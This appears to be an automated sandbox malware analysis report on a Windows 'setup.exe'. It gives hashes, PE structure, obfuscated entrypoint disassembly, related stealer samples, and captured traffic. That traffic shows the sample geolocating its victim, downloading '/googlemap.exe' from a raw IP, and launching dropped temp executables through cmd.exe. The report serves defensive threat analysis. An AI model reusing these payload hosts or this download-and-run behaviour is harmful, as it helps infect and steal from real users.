| https://eu-central.storage.cloudconvert.com/tasks/7667d2fd-6c13-460b-8f55-f179433b3df4/bfcce31c888656d9c91c1b50d320f0648923cfac65d48f69d06cc63b929442e7.zip?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Content-Sha256=UNSIGNED-PAYLOAD&X-Amz-Credential=cloudconvert-production%2F20240712%2Ffra%2Fs3%2Faws4_request&X-Amz-Date=20240712T095048Z&X-Amz-Expires=86400&X-Amz-Signature=24a9e07e4d7f7a1e041068ee72845360480440bd0d03e47d7a22ccf3f04b294d&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3D%22bfcce31c888656d9c91c1b50d320f0648923cfac65d48f69d06cc63b929442e7.zip%22&response-content-type=application%2Fzip&x-id=GetObject | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 208.95.112.1
| QUOTATION_JULQTRA071244#U00faPDF.scr.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
| QUOTATION_JULQTRA071244#U00faPDF.scr.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
| NEW ORDER.exe | Get hash | malicious | AgentTesla | Browse | 208.95.112.1
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.W32.Kryptik.CI.tr.21358.1519.exe | Get hash | malicious | Unknown | Browse | 104.21.79.229
| DHL_AWB#6078538091.exe | Get hash | malicious | FormBook | Browse | 104.21.79.229
| Orden de Compra.exe | Get hash | malicious | GuLoader | Browse | 104.21.79.229
| cheat.exe | Get hash | malicious | Unknown | Browse | 104.21.79.229
| mlk3kK6uLZ.exe | Get hash | malicious | Amadey, Mars Stealer, PureLog Stealer, Quasar, RedLine, Stealc, Vidar | Browse | 104.21.79.229
| Price Offer_1200R4 1200R20.exe | Get hash | malicious | GuLoader, RedLine | Browse | 104.21.79.229
| file.hta | Get hash | malicious | Unknown | Browse | 104.21.79.229
| rCompanyProfile.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 104.21.79.229
| SecuriteInfo.com.Win32.SuspectCrc.2428.21334.exe | Get hash | malicious | GuLoader, Snake Keylogger | Browse | 104.21.79.229
                            No context
Process: C:\Users\user\Desktop\setup.exe
File Type: JSON data
Category: dropped
Size (bytes): 305
Entropy (8bit): 4.8875748675707955
Encrypted: false
SSDEEP: 6:YWybucxaNmd4rpHXIpIIIk7+Bkz4fQbtVVgW+1C/kB5CLj6H/RGzqd7XNn:YWybucxaNmd4rpHMIi+BgBVVf+teOfFr
MD5: F803395CCB7D2AB64275B986EE0304CA
SHA1: EFAA033BC749421ECEA73031808AF68E845619F0
SHA-256: DC88C96FFFB9D323E60D642016683945C395AF675CDC8DF089A2949AECE9011A
SHA-512: BAC440BCD66239BB492C3B76B48A8D1CC8F04604830C8676736A15A71A5EE9580119AFC31305ACFB9F193726162133ACB01B90F812B3458E795D694314496C87
Malicious: false
Reputation: low
Preview: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.33"}
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.272562266136198
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: setup.exe
File size: 2'341'888 bytes
MD5: efe2c721d0d0d48abe27aeb0285d36b8
SHA1: f2e6c2b92d26fbf31c4cae9dbee1ff578ac86940
SHA256: 155ad546339267dea91ea573275e5912450d803ca537c9d454f48d9b7fd2749a
SHA512: 71ef9082b2c8f57f21353ed33d03db7801ea98acff34ad55a14b1a4009fae309d6af43d93281d7fd4341aa8d7c20eade55ffde9786aaeb357a559fdab3420f80
SSDEEP: 49152:UgjT4hhRFURQh9Aj40DeGSwyfjblvrDAQ6:UgjT4hhRnhKjrFSh/hrs
TLSH: 56B5AB2E1383C211F82E11345966E67573EDFC975D257B8D96C2FEBB3030E025AEA918
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!...@w..@w..@w..&t..@w..&r..@w..&s..@w.)*s..@w.)*t..@w.)*r..@w..&v..@w..@v..@w..+~..@w..+...@w..+u..@w.Rich.@w................
Icon Hash: 0e27697065311323
Entrypoint: 0x94f000
Entrypoint Section: gegnfrcd
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x5F81920A [Sat Oct 10 10:50:50 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: baa93d47220682c04d92f7797d9224ce
                            Instruction
                            push esi
                            push eax
                            push ebx
                            call 00007F47CC8D6F46h
                            int3
                            pop eax
                            mov ebx, eax
                            inc eax
                            sub eax, 00212000h
                            sub eax, 100C1744h
                            add eax, 100C173Bh
                            cmp byte ptr [ebx], FFFFFFCCh
                            jne 00007F47CC8D6F5Bh
                            mov byte ptr [ebx], 00000000h
                            mov ebx, 00001000h
                            push 74C52558h
                            push 522B816Ah
                            push ebx
                            push eax
                            call 00007F47CC8D6F4Fh
                            add eax, 00000000h
                            mov dword ptr [esp+08h], eax
                            pop ebx
                            pop eax
                            ret
                            push ebp
                            mov ebp, esp
                            push eax
                            push ebx
                            push ecx
                            push esi
                            mov esi, dword ptr [ebp+08h]
                            mov ecx, dword ptr [ebp+0Ch]
                            shr ecx, 02h
                            mov eax, dword ptr [ebp+10h]
                            mov ebx, dword ptr [ebp+14h]
                            test ecx, ecx
                            je 00007F47CC8D6F4Ch
                            xor dword ptr [esi], eax
                            add dword ptr [esi], ebx
                            add esi, 04h
                            dec ecx
                            jmp 00007F47CC8D6F34h
                            pop esi
                            pop ecx
                            pop ebx
                            pop eax
                            leave
                            retn 0010h
                            xor dh, dh
                            imul esp, dword ptr [edi+1Ah], 45h
                            adc bh, byte ptr [edx]
                            xchg dword ptr [edi+edx-448D94A6h], ebp
                            jnl 00007F47CC8D6F42h
                            movsd
                            arpl word ptr [edi-77h], dx
                            sub al, 24h
                            mov ebp, 17A02185h
                            xor ebx, ebp
                            pop ebp
                            push ebx
                            sub dword ptr [esp], 577930EAh
                            mov edx, dword ptr [esp]
                            add esp, 04h
                            add edx, 577930EAh
                            sub ebx, esi
                            mov ecx, 3971163Ch
                            sub ecx, 37E4018Fh
                            and ecx, 0A843797h
                            sub ecx, 7C8E15ABh
                            shl ecx, 03h
                            dec ecx
                            xor ecx, 05C0D64Eh
                            xor ebx, ecx
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9406d | 0x95 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x25000 | 0x6eb63 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x941f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
| 0x1000 | 0x24000 | 0x24000 | 73a2a23c322ac9c2211b2dbc920eebe6 | False | 0.6132609049479166 | data | 6.99772907263561 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25000 | 0x6eb63 | 0x4a00 | f7f0be8cb1f77244ad4562c59309cd9c | False | 0.9724978885135135 | data | 7.89332696953071 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x94000 | 0x1000 | 0x200 | fcd8670d94727052904b63820330082f | False | 0.181640625 | data | 1.3087225765280863 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
| 0x95000 | 0x2a8000 | 0x200 | 33650362b9d1d11194134e25744b72a3 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
pebpncdj | 0x33d000 | 0x212000 | 0x211c00 | 20af796270b8c3925e2723c5b401b42c | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
gegnfrcd | 0x54f000 | 0x1000 | 0x200 | ce6aea9c5609e8f84f891484b1fa1945 | False | 0.482421875 | data | 3.7663669199452317 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x4e0290 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.299645390070922
RT_ICON | 0x4e06f8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.16158536585365854
RT_ICON | 0x4e17a0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 0 | English | United States | 0.08579357581483231
RT_ICON | 0x4e59c8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 0 | English | United States | 0.04283982018218384
RT_ICON | 0x4f61f0 | 0x14e | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.24850299401197604
RT_ICON | 0x4f633e | 0x42028 | Device independent bitmap graphic, 256 x 512 x 32, image size 0 | English | United States | 0.02358937183773708
RT_ICON | 0x538366 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.299645390070922
RT_ICON | 0x5387ce | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | United States | 0.16158536585365854
RT_ICON | 0x539876 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 0 | English | United States | 0.08579357581483231
RT_ICON | 0x53da9e | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 0 | English | United States | 0.04283982018218384
RT_GROUP_ICON | 0x54e2c6 | 0x5a | data | English | United States | 0.7555555555555555
RT_GROUP_ICON | 0x54e320 | 0x22 | data | English | United States | 1.088235294117647
RT_GROUP_ICON | 0x54e342 | 0x22 | data | English | United States | 1.1176470588235294
RT_VERSION | 0x54e364 | 0x360 | data | English | United States | 0.41898148148148145
RT_MANIFEST | 0x54e6c4 | 0x3e7 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (939), with CRLF line terminators | English | United States | 0.5145145145145145
DLL | Import
kernel32.dll | lstrcpy
comctl32.dll | InitCommonControls
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 14, 2024 18:48:04.095606089 CEST | 49713 | 443 | 192.168.2.6 | 104.21.79.229
Jul 14, 2024 18:48:04.095643997 CEST | 443 | 49713 | 104.21.79.229 | 192.168.2.6
Jul 14, 2024 18:48:04.095719099 CEST | 49713 | 443 | 192.168.2.6 | 104.21.79.229
Jul 14, 2024 18:48:04.117841959 CEST | 49713 | 443 | 192.168.2.6 | 104.21.79.229
Jul 14, 2024 18:48:04.117897987 CEST | 443 | 49713 | 104.21.79.229 | 192.168.2.6
Jul 14, 2024 18:48:04.623415947 CEST | 443 | 49713 | 104.21.79.229 | 192.168.2.6
Jul 14, 2024 18:48:04.624037981 CEST | 49713 | 443 | 192.168.2.6 | 104.21.79.229
Jul 14, 2024 18:48:04.688221931 CEST | 49713 | 443 | 192.168.2.6 | 104.21.79.229
Jul 14, 2024 18:48:04.688266039 CEST | 443 | 49713 | 104.21.79.229 | 192.168.2.6
Jul 14, 2024 18:48:04.688711882 CEST | 443 | 49713 | 104.21.79.229 | 192.168.2.6
Jul 14, 2024 18:48:04.690903902 CEST | 49713 | 443 | 192.168.2.6 | 104.21.79.229
Jul 14, 2024 18:48:04.694047928 CEST | 49713 | 443 | 192.168.2.6 | 104.21.79.229
Jul 14, 2024 18:48:04.740503073 CEST | 443 | 49713 | 104.21.79.229 | 192.168.2.6
Jul 14, 2024 18:48:05.157999039 CEST | 443 | 49713 | 104.21.79.229 | 192.168.2.6
Jul 14, 2024 18:48:05.158111095 CEST | 49713 | 443 | 192.168.2.6 | 104.21.79.229
Jul 14, 2024 18:48:05.158124924 CEST | 443 | 49713 | 104.21.79.229 | 192.168.2.6
Jul 14, 2024 18:48:05.158173084 CEST | 443 | 49713 | 104.21.79.229 | 192.168.2.6
Jul 14, 2024 18:48:05.158268929 CEST | 49713 | 443 | 192.168.2.6 | 104.21.79.229
Jul 14, 2024 18:48:05.212671995 CEST | 49713 | 443 | 192.168.2.6 | 104.21.79.229
Jul 14, 2024 18:48:05.212697029 CEST | 443 | 49713 | 104.21.79.229 | 192.168.2.6
Jul 14, 2024 18:48:16.758513927 CEST | 49719 | 80 | 192.168.2.6 | 208.95.112.1
Jul 14, 2024 18:48:16.763459921 CEST | 80 | 49719 | 208.95.112.1 | 192.168.2.6
Jul 14, 2024 18:48:16.763554096 CEST | 49719 | 80 | 192.168.2.6 | 208.95.112.1
Jul 14, 2024 18:48:16.764935017 CEST | 49719 | 80 | 192.168.2.6 | 208.95.112.1
Jul 14, 2024 18:48:16.769826889 CEST | 80 | 49719 | 208.95.112.1 | 192.168.2.6
Jul 14, 2024 18:48:17.253199100 CEST | 80 | 49719 | 208.95.112.1 | 192.168.2.6
Jul 14, 2024 18:48:17.253385067 CEST | 49719 | 80 | 192.168.2.6 | 208.95.112.1
Jul 14, 2024 18:48:17.283986092 CEST | 49720 | 80 | 192.168.2.6 | 45.12.4.151
Jul 14, 2024 18:48:17.288795948 CEST | 80 | 49720 | 45.12.4.151 | 192.168.2.6
Jul 14, 2024 18:48:17.292234898 CEST | 49720 | 80 | 192.168.2.6 | 45.12.4.151
Jul 14, 2024 18:48:17.292234898 CEST | 49720 | 80 | 192.168.2.6 | 45.12.4.151
Jul 14, 2024 18:48:17.297082901 CEST | 80 | 49720 | 45.12.4.151 | 192.168.2.6
Jul 14, 2024 18:48:19.031194925 CEST | 80 | 49720 | 45.12.4.151 | 192.168.2.6
Jul 14, 2024 18:48:19.031354904 CEST | 49720 | 80 | 192.168.2.6 | 45.12.4.151
Jul 14, 2024 18:48:19.034729004 CEST | 49720 | 80 | 192.168.2.6 | 45.12.4.151
Jul 14, 2024 18:48:19.039886951 CEST | 80 | 49720 | 45.12.4.151 | 192.168.2.6
Jul 14, 2024 18:48:24.273936987 CEST | 49719 | 80 | 192.168.2.6 | 208.95.112.1
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jul 14, 2024 18:48:04.071732998 CEST | 63284 | 53 | 192.168.2.6 | 1.1.1.1
Jul 14, 2024 18:48:04.081602097 CEST | 53 | 63284 | 1.1.1.1 | 192.168.2.6
Jul 14, 2024 18:48:05.218271971 CEST | 50180 | 53 | 192.168.2.6 | 1.1.1.1
Jul 14, 2024 18:48:05.230529070 CEST | 53 | 50180 | 1.1.1.1 | 192.168.2.6
Jul 14, 2024 18:48:16.348800898 CEST | 62033 | 53 | 192.168.2.6 | 1.1.1.1
Jul 14, 2024 18:48:16.683933973 CEST | 53 | 62033 | 1.1.1.1 | 192.168.2.6
Jul 14, 2024 18:48:16.750257015 CEST | 56659 | 53 | 192.168.2.6 | 1.1.1.1
Jul 14, 2024 18:48:16.757658005 CEST | 53 | 56659 | 1.1.1.1 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jul 14, 2024 18:48:04.071732998 CEST | 192.168.2.6 | 1.1.1.1 | 0xc152 | Standard query (0) | 2no.co | A (IP address) | IN (0x0001) | false
Jul 14, 2024 18:48:05.218271971 CEST | 192.168.2.6 | 1.1.1.1 | 0x13e4 | Standard query (0) | suomenen.com | A (IP address) | IN (0x0001) | false
Jul 14, 2024 18:48:16.348800898 CEST | 192.168.2.6 | 1.1.1.1 | 0x480 | Standard query (0) | nffiiload08.top | A (IP address) | IN (0x0001) | false
Jul 14, 2024 18:48:16.750257015 CEST | 192.168.2.6 | 1.1.1.1 | 0xab1e | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jul 14, 2024 18:48:04.081602097 CEST | 1.1.1.1 | 192.168.2.6 | 0xc152 | No error (0) | 2no.co | | 104.21.79.229 | A (IP address) | IN (0x0001) | false
Jul 14, 2024 18:48:04.081602097 CEST | 1.1.1.1 | 192.168.2.6 | 0xc152 | No error (0) | 2no.co | | 172.67.149.76 | A (IP address) | IN (0x0001) | false
Jul 14, 2024 18:48:05.230529070 CEST | 1.1.1.1 | 192.168.2.6 | 0x13e4 | Name error (3) | suomenen.com | none | none | A (IP address) | IN (0x0001) | false
Jul 14, 2024 18:48:16.683933973 CEST | 1.1.1.1 | 192.168.2.6 | 0x480 | Name error (3) | nffiiload08.top | none | none | A (IP address) | IN (0x0001) | false
Jul 14, 2024 18:48:16.757658005 CEST | 1.1.1.1 | 192.168.2.6 | 0xab1e | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
                            • 2no.co
                            • ip-api.com
                            • 45.12.4.151
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49719 | 208.95.112.1 | 80 | 4328 | C:\Users\user\Desktop\setup.exe
Timestamp | Bytes transferred | Direction | Data
Jul 14, 2024 18:48:16.764935017 CEST | 273 | OUT | GET /json HTTP/1.1
                            Accept: */*
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                            Host: ip-api.com
                            Connection: Keep-Alive
Jul 14, 2024 18:48:17.253199100 CEST | 482 | IN | HTTP/1.1 200 OK
                            Date: Sun, 14 Jul 2024 16:48:16 GMT
                            Content-Type: application/json; charset=utf-8
                            Content-Length: 305
                            Access-Control-Allow-Origin: *
                            X-Ttl: 60
                            X-Rl: 44
                            Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                            Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.33"}


                            Session ID: 1 | Source IP: 192.168.2.6 | Source Port: 49720 | Destination IP: 45.12.4.151 | Destination Port: 80 | PID: 4328 | Process: C:\Users\user\Desktop\setup.exe
                            Timestamp: Jul 14, 2024 18:48:17.292234898 CEST | Bytes transferred: 283 | Direction: OUT
                            Data:
                            GET /googlemap.exe HTTP/1.1
                            Accept: */*
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                            Host: 45.12.4.151
                            Connection: Keep-Alive


                            Session ID: 0 | Source IP: 192.168.2.6 | Source Port: 49713 | Destination IP: 104.21.79.229 | Destination Port: 443 | PID: 4328 | Process: C:\Users\user\Desktop\setup.exe
                            Timestamp: 2024-07-14 16:48:04 UTC | Bytes transferred: 271 | Direction: OUT
                            Data:
                            GET /2URUU5 HTTP/1.1
                            Accept: */*
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                            Host: 2no.co
                            Connection: Keep-Alive
                            Timestamp: 2024-07-14 16:48:05 UTC | Bytes transferred: 1192 | Direction: IN
                            Data:
                            HTTP/1.1 302 Found
                            Date: Sun, 14 Jul 2024 16:48:05 GMT
                            Content-Type: text/html; charset=UTF-8
                            Transfer-Encoding: chunked
                            Connection: close
                            location: http://suomenen.com/helka/trll.php
                            set-cookie: 20823918137263905=1; expires=Mon, 14 Jul 2025 16:48:05 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                            set-cookie: clhf03028ja=8.46.123.33; expires=Mon, 14 Jul 2025 16:48:05 GMT; Max-Age=31536000; path=/; secure; HttpOnly; SameSite=Strict
                            memory: 0.41253662109375
                            expires: Sun, 14 Jul 2024 16:48:05 +0000
                            Cache-Control: no-store, no-cache, must-revalidate
                            strict-transport-security: max-age=604800
                            strict-transport-security: max-age=31536000
                            content-security-policy: img-src https: data:; upgrade-insecure-requests
                            x-frame-options: SAMEORIGIN
                            CF-Cache-Status: DYNAMIC
                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zvU9Y%2FNyYx%2Be6Fwz97HY0uwxleU8QCtRUIgebqOpORAD7vgmIHDZD9bBEJ9rG9Wk480qe0fzNEwcWOzvtt%2FHgf3OVnRmzl6Qh4GgECQNbNmadcxmJ6yzkNM%3D"}],"group":"cf-nel","max_age":604800}
                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                            Server: cloudflare
                            CF-RAY: 8a32ff8da8d672b1-EWR
                            alt-svc: h3=":443"; ma=86400
                            Timestamp: 2024-07-14 16:48:05 UTC | Bytes transferred: 5 | Direction: IN
                            Data Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            Target ID: 0
                            Start time: 12:47:44
                            Start date: 14/07/2024
                            Path: C:\Users\user\Desktop\setup.exe
                            Wow64 process (32bit): true
                            Commandline: "C:\Users\user\Desktop\setup.exe"
                            Imagebase: 0x250000
                            File size: 2'341'888 bytes
                            MD5 hash: EFE2C721D0D0D48ABE27AEB0285D36B8
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Reputation: low
                            Has exited: true

                            Target ID: 5
                            Start time: 12:48:04
                            Start date: 14/07/2024
                            Path: C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit): true
                            Commandline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\tdxotjb.exe"
                            Imagebase: 0x1c0000
                            File size: 236'544 bytes
                            MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Reputation: high
                            Has exited: true

                            Target ID: 6
                            Start time: 12:48:04
                            Start date: 14/07/2024
                            Path: C:\Windows\System32\conhost.exe
                            Wow64 process (32bit): false
                            Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase: 0x7ff66e660000
                            File size: 862'208 bytes
                            MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Reputation: high
                            Has exited: true

                            Target ID: 8
                            Start time: 12:48:15
                            Start date: 14/07/2024
                            Path: C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit): true
                            Commandline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\fydskqglg.exe"
                            Imagebase: 0x1c0000
                            File size: 236'544 bytes
                            MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Reputation: high
                            Has exited: true

                            Target ID: 9
                            Start time: 12:48:15
                            Start date: 14/07/2024
                            Path: C:\Windows\System32\conhost.exe
                            Wow64 process (32bit): false
                            Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase: 0x7ff66e660000
                            File size: 862'208 bytes
                            MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Reputation: high
                            Has exited: true

                            Target ID: 10
                            Start time: 12:48:15
                            Start date: 14/07/2024
                            Path: C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit): true
                            Commandline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\mmqjncscdre.exe"
                            Imagebase: 0x1c0000
                            File size: 236'544 bytes
                            MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Reputation: high
                            Has exited: true

                            Target ID: 11
                            Start time: 12:48:15
                            Start date: 14/07/2024
                            Path: C:\Windows\System32\conhost.exe
                            Wow64 process (32bit): false
                            Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase: 0x7ff66e660000
                            File size: 862'208 bytes
                            MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Reputation: high
                            Has exited: true

                            Target ID: 12
                            Start time: 12:48:18
                            Start date: 14/07/2024
                            Path: C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit): true
                            Commandline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\nmhqwem.exe"
                            Imagebase: 0x1c0000
                            File size: 236'544 bytes
                            MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Reputation: high
                            Has exited: true

                            Target ID: 13
                            Start time: 12:48:18
                            Start date: 14/07/2024
                            Path: C:\Windows\System32\conhost.exe
                            Wow64 process (32bit): false
                            Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase: 0x7ff66e660000
                            File size: 862'208 bytes
                            MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
                            Has elevated privileges: true
                            Has administrator privileges: true
                            Programmed in: C, C++ or other language
                            Reputation: high
                            Has exited: true

                            No disassembly